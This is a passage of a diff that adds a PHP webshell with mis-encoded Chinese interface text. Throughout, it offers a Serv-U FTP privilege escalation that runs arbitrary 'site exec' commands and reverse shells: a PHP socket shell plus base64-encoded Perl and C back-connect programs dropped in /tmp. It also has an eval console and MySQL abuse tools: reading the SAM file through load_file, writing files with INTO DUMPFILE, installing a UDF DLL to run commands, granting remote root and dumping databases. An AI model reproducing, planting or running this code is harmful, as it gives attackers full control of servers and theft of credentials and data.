          '; + $sendbuf = ""; + $recvbuf = ""; + $domain = "-SETDOMAIN\r\n"."-Domain=haxorcitos|0.0.0.0|21|-1|1|0\r\n"."-TZOEnable=0\r\n"." TZOKey=\r\n"; + $adduser = "-SETUSERSETUP\r\n"."-IP=0.0.0.0\r\n"."-PortNo=21\r\n"."-User=".$_POST['user']."\r\n"."-Password=".$_POST['password']."\r\n"."-HomeDir=c:\\\r\n"."-LoginMesFile=\r\n"."-Disable=0\r\n"."-RelPaths=1\r\n"."-NeedSecure=0\r\n"."-HideHidden=0\r\n"."-AlwaysAllowLogin=0\r\n"."-ChangePassword=0\r\n". + "-QuotaEnable=0\r\n"."-MaxUsersLoginPerIP=-1\r\n"."-SpeedLimitUp=0\r\n"."-SpeedLimitDown=0\r\n"."-MaxNrUsers=-1\r\n"."-IdleTimeOut=600\r\n"."-SessionTimeOut=-1\r\n"."-Expire=0\r\n"."-RatioUp=1\r\n"."-RatioDown=1\r\n"."-RatiosCredit=0\r\n"."-QuotaCurrent=0\r\n"."-QuotaMaximum=0\r\n". + "-Maintenance=None\r\n"."-PasswordType=Regular\r\n"."-Ratios=None\r\n"." Access=".$_POST['part']."\|RWAMELCDP\r\n"; + $deldomain = "-DELETEDOMAIN\r\n"."-IP=0.0.0.0\r\n"." PortNo=21\r\n"; + $sock = @fsockopen("127.0.0.1", $_POST["SUPort"], &$errno, &$errstr, 10); + $recvbuf = @fgets($sock, 1024); + echo "ݰ: $recvbuf
          "; + $sendbuf = "USER ".$_POST["SUUser"]."\r\n"; + @fputs($sock, $sendbuf, strlen($sendbuf)); + echo "ݰ: $sendbuf
          "; + $recvbuf = @fgets($sock, 1024); + echo "ݰ: $recvbuf
          "; + $sendbuf = "PASS ".$_POST["SUPass"]."\r\n"; + @fputs($sock, $sendbuf, strlen($sendbuf)); + echo "ݰ: $sendbuf
          "; + $recvbuf = @fgets($sock, 1024); + echo "ݰ: $recvbuf
          "; + $sendbuf = "SITE MAINTENANCE\r\n"; + @fputs($sock, $sendbuf, strlen($sendbuf)); + echo "ݰ: $sendbuf
          "; + $recvbuf = @fgets($sock, 1024); + echo "ݰ: $recvbuf
          "; + $sendbuf = $domain; + @fputs($sock, $sendbuf, strlen($sendbuf)); + echo "ݰ: $sendbuf
          "; + $recvbuf = @fgets($sock, 1024); + echo "ݰ: $recvbuf
          "; + $sendbuf = $adduser; + @fputs($sock, $sendbuf, strlen($sendbuf)); + echo "ݰ: $sendbuf
          "; + $recvbuf = @fgets($sock, 1024); + echo "ݰ: $recvbuf
          "; + if(!empty($_POST['SUCommand'])) + { + $exp = @fsockopen("127.0.0.1", "21", &$errno, &$errstr, 10); + $recvbuf = @fgets($exp, 1024); + echo "ݰ: $recvbuf
          "; + $sendbuf = "USER ".$_POST['user']."\r\n"; + @fputs($exp, $sendbuf, strlen($sendbuf)); + echo "ݰ: $sendbuf
          "; + $recvbuf = @fgets($exp, 1024); + echo "ݰ: $recvbuf
          "; + $sendbuf = "PASS ".$_POST['password']."\r\n"; + @fputs($exp, $sendbuf, strlen($sendbuf)); + echo "ݰ: $sendbuf
          "; + $recvbuf = @fgets($exp, 1024); + echo "ݰ: $recvbuf
          "; + $sendbuf = "site exec ".$_POST["SUCommand"]."\r\n"; + @fputs($exp, $sendbuf, strlen($sendbuf)); + echo "ݰ: site exec ".$_POST["SUCommand"]."
          "; + $recvbuf = @fgets($exp, 1024); + echo "ݰ: $recvbuf
          "; + $sendbuf = $deldomain; + @fputs($sock, $sendbuf, strlen($sendbuf)); + echo "ݰ: $sendbuf
          "; + $recvbuf = @fgets($sock, 1024); + echo "ݰ: $recvbuf
          "; + @fclose($exp); + } + @fclose($sock); + echo '
          '; + } +} +// +function backconn() +{ +$ty=$_GET['ty']; +if($ty=='socket'){ +@set_time_limit(0); +$system=strtoupper(substr(PHP_OS, 0, 3)); +if(!extension_loaded('sockets')) +{ +if($system == 'WIN'){@dl('php_sockets.dll') or die("Can't load socket");} +else{@dl('sockets.so') or die("Can't load socket");} +} +if(isset($_POST['host']) && isset($_POST['port'])) +{ +$host = $_POST['host']; +$port = $_POST['port']; +}else{ +print<<
          +
          :Linux Windows

          +
          +˿ڣ

          +

          +END; +} +if($system=="WIN"){$env=array('path' => 'c:\\windows\\system32');} +else{$env = array('PATH' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin');} +$descriptorspec = array(0 => array("pipe","r"),1 => array("pipe","w"),2 => array("pipe","w"),); +$host=gethostbyname($host); +$proto=getprotobyname("tcp"); +if(($sock=socket_create(AF_INET,SOCK_STREAM,$proto))<0){die("Socketʧ");} +if(($ret=socket_connect($sock,$host,$port))<0){die("ʧ");} +else{ +$message=" PHP\n"; +socket_write($sock,$message,strlen($message)); +$cwd=str_replace('\\','/',dirname(__FILE__)); +while($cmd=socket_read($sock,65535,$proto)) +{ +if(trim(strtolower($cmd))=="exit"){socket_write($sock,"Bye\n"); exit;} +else{ +$process = proc_open($cmd, $descriptorspec, $pipes, $cwd, $env); +if (is_resource($process)){ +fwrite($pipes[0], $cmd); +fclose($pipes[0]); +$msg=stream_get_contents($pipes[1]); +socket_write($sock,$msg,strlen($msg)); +fclose($pipes[1]); +$msg=stream_get_contents($pipes[2]); +socket_write($sock,$msg,strlen($msg)); +$return_value = proc_close($process); +} +} +} +} +} +elseif($ty=='linux'){ +$yourip = isset($_POST['yourip']) ? $_POST['yourip'] : getenv('REMOTE_ADDR'); +$yourport = isset($_POST['yourport']) ? $_POST['yourport'] : '12666'; +print<<
          +
          ĵַ
          +Ӷ˿
          +ִзʽ    +


          +END; +if((!empty($_POST['yourip'])) && (!empty($_POST['yourport']))) +{ +echo '
          '; +if($_POST['use'] == 'perl') +{ +$back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; +echo File_Write('/tmp/yoco_bc',base64_decode($back_connect_pl),'wb') ? '/tmp/yoco_bcɹ
          ' : '/tmp/yoco_bcʧ
          '; +$perlpath = Exec_Run('which perl'); +$perlpath = $perlpath ? chop($perlpath) : 'perl'; +echo Exec_Run($perlpath.' /tmp/yoco_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : 'ִʧ'; +} +if($_POST['use'] == 'c') +{ +$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJybSAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJsZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7DQogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; +echo File_Write('/tmp/yoco_bc.c',base64_decode($back_connect_c),'wb') ? '/tmp/yoco_bc.cɹ
          ' : '/tmp/yoco_bc.cʧ
          '; +$res = Exec_Run('gcc -o /tmp/angel_bc /tmp/angel_bc.c'); +@unlink('/tmp/yoco.c'); +echo Exec_Run('/tmp/yoco_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : 'ִʧ'; +} +echo '
          ԳӶ˿ (nc -l -n -v -p '.$_POST['yourport'].')
          '; +} +return true; +}else{ +print<<
          +
          [ C/Perl - Linux ]

          +
          linuxȨеķcmdӡ
          +ԭǽӹܵperlűCд/tmpļв
          +phpִкܵ·ʧ
          +nc˿ڣnc -vv -l -p 12666



          + [ Socket - Windows ]

          +
          PHPʹSocketcmdshellӡWebshellڷΪWindowsϵͳ
          +ĿǰûззSocketƣphp_socketsΪopen/enable
          +ͨphpinfo()鿴Ƿphp_socket
          +Socketӵ;ڵPHP˲ִкִ
          +ҪäĿӣɷԴľغ
          +nc.exe˿ڣnc -vv -l -p 5555
          +
          +END; +} +} +//evalִphp +function phpcode() +{ +print<<
          php:
          +
          +

          +

          +END; +$phpcode = $_POST['phpcode']; +$phpcode = trim($phpcode); +if($phpcode){ +if(!preg_match('#<\?#si',$phpcode)){$phpcode = "";} +eval("?".">$phpcode
          '; +} +return false; +} +//ݿ +function otherdb(){ +$db = isset($_GET['db']) ? $_GET['db'] : 'ms'; +print<< + +END; +if ($db=="ms"){ +$mshost = isset($_POST['mshost']) ? $_POST['mshost']:'localhost'; +$msuser = isset($_POST['msuser']) ? $_POST['msuser'] : 'sa'; +$mspass = isset($_POST['mspass']) ? $_POST['mspass'] : ''; +$msdbname = isset($_POST['msdbname']) ? $_POST['msdbname'] : 'master'; +$msaction = isset($_POST['action']) ? $_POST['action'] : ''; +$msquery = isset($_POST['mssql']) ? $_POST['mssql'] : ''; +$msquery = stripslashes($msquery); +print<< +
          +Host: +User: +Pass: +Dbname:
          + +
          + + +
          +END; +if ($msaction == 'msquery'){ +$msconn= mssql_connect ($mshost , $msuser, $mspass); +mssql_select_db($msdbname,$msconn) or die("connect error :" .mssql_get_last_message()); +$msresult = mssql_query($msquery) or die(mssql_get_last_message()); +echo ''."\n\n"; +for ($i=0; $i'.mssql_field_name($msresult, $i)."\n";} +echo "\n"; +mssql_data_seek($result, 0); +while ($msrow=mssql_fetch_row($msresult)) +{ +echo "\n"; +for ($i=0; $i'."$msrow[$i]".'';} +echo "\n"; +} +echo "
          "; +mssql_free_result($msresult); +mssql_close(); +} +} +elseif ($db=="ora"){ +$orahost = isset($_POST['orahost']) ? $_POST['orahost'] : 'localhost'; +$oraport = isset($_POST['oraport']) ? $_POST['oraport'] : '1521'; +$orauser = isset($_POST['orauser']) ? $_POST['orauser'] : 'root'; +$orapass = isset($_POST['orapass']) ? $_POST['orapass'] : '123456'; +$orasid = isset($_POST['orasid']) ? $_POST['orasid'] : 'ORCL'; +$oraaction = isset($_POST['action']) ? $_POST['action'] : ''; +$oraquery = isset($_POST['orasql']) ? $_POST['orasql'] : ''; +$oraquery = stripslashes($oraquery); +print<< +
          +Host: +Port: +User: +Pass: +SID:
          + +
          + + +
          +END; +if($oraaction == 'oraquery'){ +$oralink=OCILogon($orauser,$orapass,"(DEscriptION=(ADDRESS=(PROTOCOL =TCP)(HOST=$orahost)(PORT = $oraport))(CONNECT_DATA =(SID=$orasid)))") or die(ocierror()); +$oraresult=ociparse($oralink,$oraquery) or die(ocierror()); +$orarow=oci_fetch_row($oraresult); +echo ''."\n\n"; +for ($i=0; $i'.oci_field_name($oraresult, $i)."\n";} +echo "\n"; +ociresult($oraresult, 0); +while ($orarow=ora_fetch_row($oraresult)) +{ +echo "\n"; +for ($i=0; $i'."$orarow[$i]".'';} +echo "\n"; +} +echo "
          "; +oci_free_statement($oraresult); +ocilogoff(); +} +} +elseif ($db == "ifx"){ +$ifxuser = isset($_POST['ifxuser']) ? $_POST['ifxuser'] : 'root'; +$ifxpass = isset($_POST['ifxpass']) ? $_POST['ifxpass'] : '123456'; +$ifxdbname = isset($_POST['ifxdbname']) ? $_POST['ifxdbname'] : 'ifxdb'; +$ifxaction = isset($_POST['action']) ? $_POST['action'] : ''; +$ifxquery = isset($_POST['ifxsql']) ? $_POST['ifxsql'] : ''; +$ifxquery = stripslashes($ifxquery); +print<< +
          Dbname: +User: +Pass:
          + +
          + + +
          +END; +if($ifxaction == 'ifxquery'){ +$ifxlink = ifx_connect($ifcdbname, $ifxuser, $ifxpass) or die(ifx_errormsg()); +$ifxresult = ifx_query($ifxquery,$ifxlink) or die (ifx_errormsg()); +$ifxrow=ifx_fetch_row($ifxresult); +echo ''."\n\n"; +for($i=0; $i'.ifx_fieldproperties($ifxresult)."\n";} +echo "\n"; +mysql_data_seek($ifxresult, 0); +while ($ifxrow=ifx_fetch_row($ifxresult)) +{ +echo "\n"; +for ($i=0; $i'."$ifxrow[$i]".'';} +echo "\n"; +} +echo "
          "; +ifx_free_result($ifxresult); +ifx_close(); +} +} +elseif ($db=="db2"){ +$db2host = isset($_POST['db2host']) ? $_POST['db2host'] : 'localhost'; +$db2port = isset($_POST['db2port']) ? $_POST['db2port'] : '50000'; +$db2user = isset($_POST['db2user']) ? $_POST['db2user'] : 'root'; +$db2pass = isset($_POST['db2pass']) ? $_POST['db2pass'] : '123456'; +$db2dbname = isset($_POST['db2dbname']) ? $_POST['db2dbname'] : 'mysql'; +$db2action = isset($_POST['action']) ? $_POST['action'] : ''; +$db2query = isset($_POST['db2sql']) ? $_POST['db2sql'] : ''; +$db2query = stripslashes($db2query); +print<< +
          Host: +Port: +User: +Pass: +Dbname:
          + +
          + + +
          +END; +if ($myaction == 'db2query'){ +$db2link = db2_connect($db2dbname, $db2user, $db2pass) or die(db2_conn_errormsg()); +$db2result = db2_exec($db2link,$db2query) or die(db2_stmt_errormsg()); +$db2row=db2_fetch_row($db2result); +echo ''."\n\n"; +for ($i=0; $i'.db2_field_name($db2result)."\n";} +echo "\n"; +while ($db2row=db2_fetch_row($db2result)) +{ +echo "\n"; +for ($i=0; $i'."$db2row[$i]".'';} +echo "\n"; +} +echo "
          "; +db2_free_result($db2result); +db2_close(); +} +} +elseif($db == "fb") { +$fbhost = isset($_POST['fbhost']) ? $_POST['fbhost'] : 'localhost'; +$fbpath = isset($_POST['fbpath']) ? $_POST['fbpath'] : ''; +$fbpath = str_replace("\\\\", "\\", $fbpath); +$fbuser = isset($_POST['fbuser']) ? $_POST['fbuser'] : 'sysdba'; +$fbpass = isset($_POST['fbpass']) ? $_POST['fbpass'] : 'masterkey'; +$fbaction = isset($_POST['action']) ? $_POST['action'] : ''; +$fbquery = isset($_POST['fbsql']) ? $_POST['fbsql'] : ''; +$fbquery = stripslashes($fbquery); +print<< +
          Host: +Path: +User: +Pass:
          + +
          + + +
          +END; +if($fbaction == 'fbquery'){ +$fblink = ibase_connect($fbhost.':'.$fbpath,$fbuser,$fbpass) or die(ibase_errmsg()); +$fbresult = ibase_query($fblink,$fbquery) or die(ibase_errmsg()); +echo ''."\n\n"; +for ($i=0; $i'.ibase_field_info($fbresult, $i)."\n";} +echo "\n"; +ibase_field_info($fbresult, 0); +while ($fbrow=ibase_fetch_row($fbresult)) +{ +echo "\n"; +for ($i=0; $i'."$fbrow[$i]".'';} +echo "\n"; +} +echo "
          "; +ibase_free_result($fbresult); +ibase_close(); +} +} +} +//MySqlִ +function Mysql_n() +{ + $MSG_BOX = ''; + $mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $msql = 'select version();'; + if(isset($_POST['mhost']) && isset($_POST['muser'])) + { + $mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport']; + if($conn = mysql_connect($mhost.':'.$mport,$muser,$mpass)) @mysql_select_db($mdata); + else $MSG_BOX = 'MYSQLʧ'; + } + $downfile = 'c:/windows/repair/sam'; + if(!empty($_POST['downfile'])) + { + $downfile = File_Str($_POST['downfile']); + $binpath = bin2hex($downfile); + $query = 'select load_file(0x'.$binpath.')'; + if($result = @mysql_query($query,$conn)) + { + $k = 0; $downcode = ''; + while($row = @mysql_fetch_array($result)){$downcode .= $row[$k];$k++;} + $filedown = basename($downfile); + if(!$filedown) $filedown = 'silic.tmp'; + $array = explode('.', $filedown); + $arrayend = array_pop($array); + header('Content-type: application/x-'.$arrayend); + header('Content-Disposition: attachment; filename='.$filedown); + header('Content-Length: '.strlen($downcode)); + echo $downcode; + exit; + } + else $MSG_BOX = 'ļʧ'; + } + $o = isset($_GET['o']) ? $_GET['o'] : ''; + Root_CSS(); +print<< +
          +
          +˿ + + +
          +
          +END; +if($o=='u') +{ + $uppath = 'C:/Documents and Settings/All Users/ʼ˵///exp.vbs'; + if(!empty($_POST['uppath'])) + { + $uppath = $_POST['uppath']; + $query = 'Create TABLE a (cmd text NOT NULL);'; + if(@mysql_query($query,$conn)) + { + if($tmpcode = File_Read($_FILES['upfile']['tmp_name'])){$filecode = bin2hex(File_Read($tmpcode));} + else{$tmp = File_Str(dirname(__FILE__)).'/upfile.tmp';if(File_Up($_FILES['upfile']['tmp_name'],$tmp)){$filecode = bin2hex(File_Read($tmp));@unlink($tmp);}} + $query = 'Insert INTO a (cmd) VALUES(CONVERT(0x'.$filecode.',CHAR));'; + if(@mysql_query($query,$conn)) + { + $query = 'SELECT cmd FROM a INTO DUMPFILE \''.$uppath.'\';'; + $MSG_BOX = @mysql_query($query,$conn) ? 'ϴļɹ' : 'ϴļʧ'; + } + else $MSG_BOX = 'ʱʧ'; + @mysql_query('Drop TABLE IF EXISTS a;',$conn); + } + else $MSG_BOX = 'ʱʧ'; + } +print<<
          ϴ· +

          ѡļ +
          +END; +} +elseif($o=='d') +{ +print<<

          ļ +
          +END; +}elseif($o=='tk'){ +if($_POST['dump']=='dump'){ +$mysql_link=@mysql_connect($mhost,$muser,$mpass); +mysql_select_db($mdata); +mysql_query("SET NAMES gbk"); +$mysql=""; +$q1=mysql_query("show tables"); +while($t=mysql_fetch_array($q1)){ + $table=$t[0]; + $q2=mysql_query("show create table `$table`"); + $sql=mysql_fetch_array($q2); + $mysql.=$sql['Create Table'].";\r\n\r\n"; + $q3=mysql_query("select * from `$table`"); + while($data=mysql_fetch_assoc($q3)) + { + $keys=array_keys($data); + $keys=array_map('addslashes',$keys); + $keys=join('`,`',$keys); + $keys="`".$keys."`"; + $vals=array_values($data); + $vals=array_map('addslashes',$vals); + $vals=join("','",$vals); + $vals="'".$vals."'"; + $mysql.="insert into `$table`($keys) values($vals);\r\n"; + } + $mysql.="\r\n"; +} +$filename=date("Y-m-d-GisA").".sql"; +$fp=fopen($filename,'w'); +fputs($fp,$mysql); +fclose($fp); +$tip="
          ݱݳɹݿļ[".$filename."]
          "; +}else{$tip="δݣ֤Ŀ¼д";} +print<<

          +ñܣݿɷ崻 :-(

          +{$tip}

          + + +
          +END; +}elseif($o=='tq') +{ +extract($_POST); +extract($_GET); +$post_sql = $post_sql ? $post_sql : "select state(\"net user\")"; +if($install){ + $link = mysql_connect ($mhost,$muser,$mpass) or die(mysql_error()); + mysql_select_db($mdata,$link) or die(mysql_error()); + @mysql_query("DROP TABLE udf_temp", $link); + $query="CREATE TABLE udf_temp (udf BLOB);"; +if(!($result=mysql_query($query, $link))) +die('ʱʧ'.mysql_error()); +else +{ +$code="0xquery="INSERT into udf_temp values (CONVERT($code,CHAR));"; + if(!mysql_query($query, $link)) + { + mysql_query('DROP TABLE udf_temp', $link) or die(mysql_error()); + die('װdllʧ'.mysql_error()); + } + else + { + $dllname = "mysqlDll.dll"; + if(file_exists("c:\\windows\\system32\\")) $dir="c:\\\\windows\\\\system32\\\\mysqlDll.dll"; + elseif(file_exists("c:\\winnt\\system32\\")) $dir="c:\\\\winnt\\\\system32\\\\mysqlDll.dll"; + if(file_exists($dir)) { + $time = time(); + $dir = str_replace("mysqlDll","mysqlDll_$time",$dir); + $dllname = str_replace("mysqlDll","mysqlDll_$time",$dllname); + } +$query = "SELECT udf FROM udf_temp INTO DUMPFILE '".$dir."';" ; + if(!mysql_query($query, $link)) + { + die("װʧ:$dirȨ".mysql_error()); + } + else + { + echo ''.$dir.'װɹ
          '; + } +} +mysql_query('DROP TABLE udf_temp', $link) or die(mysql_error()); +$result = mysql_query("Create Function state returns string soname '$dllname'", $link) or die(mysql_error()); +if($result) { + echo "ɹ
          "; + exit(); +} +} +} +$ss=stripslashes($post_sql); +print<< +
          +
          +END; +if ($_POST[post_sql]) { +$link = mysql_connect ($mhost,$muser,$mpass) or die(mysql_error()); +if($mdata) mysql_select_db($mdata,$link) or die(mysql_error()); +$query = stripslashes($post_sql); +$result = mysql_query($query, $link) or die(mysql_error()); +echo "
          "; +} +else +{ + if(!empty($_POST['msql'])) + { + $msql = $_POST['msql']; + if($result = @mysql_query($msql,$conn)) + { + $MSG_BOX = 'ִSQLɹ
          '; + $k = 0; + while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;} + } + else $MSG_BOX .= mysql_error(); + } +print<< +function nFull(i){ + Str = new Array(11); + Str[0] = "select version();"; + Str[1] = "select load_file(0x633A5C5C626F6F742E696E69) FROM user into outfile 'D://a.txt'"; + Str[2] = "select '' into outfile 'F://a.php';"; + Str[3] = "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;"; + nform.msql.value = Str[i]; + return true; +} + +
          +
          + + +END; +} + if($MSG_BOX != '') echo '
          '.$MSG_BOX.'
          '; + else echo '
          '; + return true; +} +//MYSQL +function Mysql_Len($data,$len) +{ + if(strlen($data) < $len) return $data; + return substr_replace($data,'...',$len); +} +function Mysql_Msg() +{ + $conn = @mysql_connect($_COOKIE['m_silichost'].':'.$_COOKIE['m_silicport'],$_COOKIE['m_silicuser'],$_COOKIE['m_silicpass']); + if($conn) + { +print<< +function Delok(msg,gourl) +{ + smsg = "ȷҪɾ[" + unescape(msg) + "]?"; + if(confirm(smsg)){window.location = gourl;} +} +function Createok(ac) +{ + if(ac == 'a') document.getElementById('nsql').value = 'CREATE TABLE name (spider BLOB);'; + if(ac == 'b') document.getElementById('nsql').value = 'CREATE DATABASE name;'; + if(ac == 'c') document.getElementById('nsql').value = 'DROP DATABASE name;'; + return false; +} + +END; + $BOOL = false; + $MSG_BOX = 'û:'.$_COOKIE['m_silicuser'].'      ַ:'.$_COOKIE['m_silichost'].':'.$_COOKIE['m_silicport'].'      汾:'; + $k = 0; + $result = @mysql_query('select version();',$conn); + while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;} + echo '
          ݿ:'; + $result = mysql_query("SHOW DATABASES",$conn); + while($db = mysql_fetch_array($result)){echo '  ['.$db['Database'].']';} + echo '
          '; + if(isset($_GET['db'])) + { + mysql_select_db($_GET['db'],$conn); + if(!empty($_POST['nsql'])){$BOOL = true; $MSG_BOX = mysql_query($_POST['nsql'],$conn) ? 'ִгɹ' : 'ִʧ '.mysql_error();} + if(is_array($_POST['insql'])) + { + $query = 'INSERT INTO '.$_GET['table'].' ('; + foreach($_POST['insql'] as $var => $key) + { + $querya .= $var.','; + $queryb .= '\''.addslashes($key).'\','; + } + $query = $query.substr($querya, 0, -1).') VALUES ('.substr($queryb, 0, -1).');'; + $MSG_BOX = mysql_query($query,$conn) ? 'ӳɹ' : 'ʧ '.mysql_error(); + } + if(is_array($_POST['upsql'])) + { + $query = 'UPDATE '.$_GET['table'].' SET '; + foreach($_POST['upsql'] as $var => $key) + { + $queryb .= $var.'=\''.addslashes($key).'\','; + } + $query = $query.substr($queryb, 0, -1).' '.base64_decode($_POST['wherevar']).';'; + $MSG_BOX = mysql_query($query,$conn) ? '޸ijɹ' : '޸ʧ '.mysql_error(); + } + if(isset($_GET['del'])) + { + $result = mysql_query('SELECT * FROM '.$_GET['table'].' LIMIT '.$_GET['del'].', 1;',$conn); + $good = mysql_fetch_assoc($result); + $query = 'DELETE FROM '.$_GET['table'].' WHERE '; + foreach($good as $var => $key){$queryc .= $var.'=\''.addslashes($key).'\' AND ';} + $where = $query.substr($queryc, 0, -4).';'; + $MSG_BOX = mysql_query($where,$conn) ? 'ɾɹ' : 'ɾʧ '.mysql_error(); + } + $action = '?s=r&db='.$_GET['db']; + if(isset($_GET['drop'])){$query = 'Drop TABLE IF EXISTS '.$_GET['drop'].';';$MSG_BOX = mysql_query($query,$conn) ? 'ɾɹ' : 'ɾʧ '.mysql_error();} + if(isset($_GET['table'])){$action .= '&table='.$_GET['table'];if(isset($_GET['edit'])) $action .= '&edit='.$_GET['edit'];} + if(isset($_GET['insert'])) $action .= '&insert='.$_GET['insert']; + echo '
          '; + echo ' '; + echo ' '; + echo ' '; + echo ' '; + echo '
          '; + echo '
          '.$MSG_BOX.'
          '.$_GET['db'].' ---> '; + if(isset($_GET['table'])) + { + echo ''.$_GET['table'].' '; + echo '[]
          '; + if(isset($_GET['edit'])) + { + if(isset($_GET['p'])) $atable = $_GET['table'].'&p='.$_GET['p']; else $atable = $_GET['table']; + echo '
          '; + $result = mysql_query('SELECT * FROM '.$_GET['table'].' LIMIT '.$_GET['edit'].', 1;',$conn); + $good = mysql_fetch_assoc($result); + $u = 0; + foreach($good as $var => $key) + { + $queryc .= $var.'=\''.$key.'\' AND '; + $type = @mysql_field_type($result, $u); + $len = @mysql_field_len($result, $u); + echo '
          '.$var.' '.$type.'('.$len.')
          '; + $u++; + } + $where = 'WHERE '.substr($queryc, 0, -4); + echo ''; + echo '
          '; + } + else + { + $query = 'SHOW COLUMNS FROM '.$_GET['table']; + $result = mysql_query($query,$conn); + $fields = array(); + $row_num = mysql_num_rows(mysql_query('SELECT * FROM '.$_GET['table'],$conn)); + if(!isset($_GET['p'])){$p = 0;$_GET['p'] = 1;} else $p = ((int)$_GET['p']-1)*20; + echo ''; + echo ''; + while($row = @mysql_fetch_assoc($result)) + { + array_push($fields,$row['Field']); + echo ''; + } + echo ''; + if(eregi('WHERE|LIMIT',$_POST['nsql']) && eregi('SELECT|FROM',$_POST['nsql'])) $query = $_POST['nsql']; else $query = 'SELECT * FROM '.$_GET['table'].' LIMIT '.$p.', 20;'; + $result = mysql_query($query,$conn); + $v = $p; + while($text = @mysql_fetch_assoc($result)) + { + echo ''; + foreach($fields as $row){echo '';} + echo ''."\r\n";$v++; + } + echo '
          '.$row['Field'].'
          ޸ '; + echo ' ɾ '.nl2br(htmlspecialchars(Mysql_Len($text[$row],500))).'
          '; + for($i = 1;$i <= ceil($row_num / 20);$i++){$k = ((int)$_GET['p'] == $i) ? ''.$i.'' : $i;echo '['.$k.'] ';} + echo '
          '; + } + } + elseif(isset($_GET['insert'])) + { + echo ''.$_GET['insert'].''; + $result = mysql_query('SELECT * FROM '.$_GET['insert'],$conn); + $fieldnum = @mysql_num_fields($result); + echo '
          '; + for($i = 0;$i < $fieldnum;$i++) + { + $name = @mysql_field_name($result, $i); + $type = @mysql_field_type($result, $i); + $len = @mysql_field_len($result, $i); + echo '
          '.$name.' '.$type.'('.$len.')
          '; + } + echo '
          '; + } + else + { + $query = 'SHOW TABLE STATUS'; + $status = @mysql_query($query,$conn); + while($statu = @mysql_fetch_array($status)) + { + $statusize[] = $statu['Data_length']; + $statucoll[] = $statu['Collation']; + } + $query = 'SHOW TABLES FROM '.$_GET['db'].';'; + echo ''; + echo ''; + echo ''; + echo ''; + echo ''; + $result = @mysql_query($query,$conn); + $k = 0; + while($table = mysql_fetch_row($result)) + { + echo ''; + echo ''; + echo ''."\r\n"; + $k++; + } + echo '
          ַ С
          '.$table[0].' ɾ '.$statucoll[$k].''.File_Size($statusize[$k]).'
